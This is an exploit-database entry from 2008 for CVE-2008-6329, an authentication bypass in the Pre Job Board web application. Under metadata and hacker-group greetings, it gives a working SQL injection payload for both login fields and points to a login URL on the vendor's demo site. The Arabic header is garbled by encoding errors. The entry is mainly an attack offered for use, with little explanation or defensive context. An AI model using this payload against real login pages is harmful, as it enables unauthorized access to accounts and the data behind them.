Pre Job Board - Authentication Bypass

Author: R3d-D3V!L
type: webapps
platform: php
port: 
date_added: 2008-11-18 
date_updated: 2016-12-06 
verified: 1 
codes: OSVDB-49983;CVE-2008-6329 
tags: 
aliases:  
screenshot_url:  
application_url:

[~] ----------------------------Ø¨Ø³Ù… Ø§Ù„Ù„Ù‡ Ø§Ù„Ø±ØÙ…Ù† Ø§Ù„Ø±ØÙŠÙ…------------------------------
[~]Tybe: (Auth Bypass) SQL Injection Vulnerability

[~]Vendor:http://www.preproject.com/preaspjobboard.asp

[~]Software: PRE JOB BOARD

[~]author: R3d-D3v!L

[~] Date: 21.11.2008

[~] Home: www.ahacker.biz

[~] contact: N/A
[~] -----------------------------------------------------------


[~] Exploit:

username: r0' or ' 1=1--
password: r0' or ' 1=1--


[~] login for demo:

http://preproject.com/preaspjobboard//Employee/emp_login.asp


[~]--------------------------------------------------------------------------------
[~] Greetz tO: keta & m4n0n & maxmos & 8orn 2 K!LL & hesham_hacker
[~]
[~]spechial thanks : dolly & 7am3m & Ø¹Ù…Ø§Ø¯ ,Ø§Ù„Ø²Ù‡ÙŠØ±ÙŠ
[~]
[~] EV!L !NS!D3 734M ---> R3d-D3v!L--EXOT!C --poison scorbion
[~]
[~] & xp10.biz & ahacker.biz
[~]
[~]--------------------------------------------------------------------------------



# milw0rm.com [2008-11-19]